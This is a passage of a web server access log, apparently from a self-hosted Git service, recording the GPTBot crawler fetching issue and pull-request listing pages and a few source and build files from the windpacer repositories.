-[17/Feb/2026:19:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt?display=source" [Client 74.7.227.38] [Length 11287] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache?display=source" [Client 74.7.227.38] [Length 11150] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:19:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:19:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 123935] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11352] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10052] 